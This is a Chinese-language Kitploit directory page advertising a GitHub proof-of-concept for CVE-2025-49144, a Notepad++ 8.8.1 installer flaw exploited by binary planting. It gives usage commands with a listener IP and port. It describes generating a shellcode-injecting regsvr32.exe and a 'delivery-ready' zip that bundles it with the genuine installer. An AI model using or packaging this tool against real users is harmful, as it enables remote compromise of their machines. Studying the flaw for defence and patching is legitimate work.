Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Notepad-8.8.1_CVE-2025-49144 — 利用 Notepad++ 8.8.1 安装程序中 CVE-2025-49144 漏洞的概念验证 (PoC)。 | Kitploit
工具/GitHubGitHub/b0ysie7e/notepad-8.8.1_cve-2025-49144
Payload生成漏洞利用Shellcode渗透测试学习与教育二进制利用
GitHubb0ysie7e/notepad-8.8.1_cve-2025-49144

Notepad-8.8.1_CVE-2025-49144

利用 Notepad++ 8.8.1 安装程序中 CVE-2025-49144 漏洞的概念验证 (PoC)。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
6131年前尚未审核

CVE-2025-49144 – Notepad++ 8.8.1 漏洞利用程序

此存储库包含一个功能性的概念验证(PoC),利用 Notepad++ 8.8.1 安装程序 中的 CVE-2025-49144 漏洞。恶意执行通过将二进制文件(regsvr32.exe)放置在易受攻击的安装程序同一目录下实现。当执行安装程序时,它会继承上下文并触发载荷。

⚠️ 免责声明
此代码严格仅用于教育和研究目的。未经明确许可在系统上未经授权使用可能构成违法。
作者对任何滥用或涉及此工具的恶意活动不承担任何责任。


🧪 前提条件

  • Python 3.x
  • msfvenom(Metasploit 框架的一部分)
  • mingw-w64(x86_64-w64-mingw32-gcc)
  • 易受攻击的安装程序:npp.8.8.1.Installer.x64.exe(必须手动放置在同一目录下)

⚙️ 使用方法

root@kitploit:~
python3 exploit.py -i <LHOST> -p <LPORT>

示例:

root@kitploit:~
python3 exploit.py -i 192.168.100.10 -p 4444

这将生成以下文件:

  • regsvr32.exe:可将 shellcode 注入到远程 notepad.exe 进程的可执行文件。
  • notepad_payload.zip:包含以下内容的交付就绪存档:
    • npp.8.8.1.Installer.x64.exe
    • regsvr32.exe

🎬 演示

[演示预览]

下载工具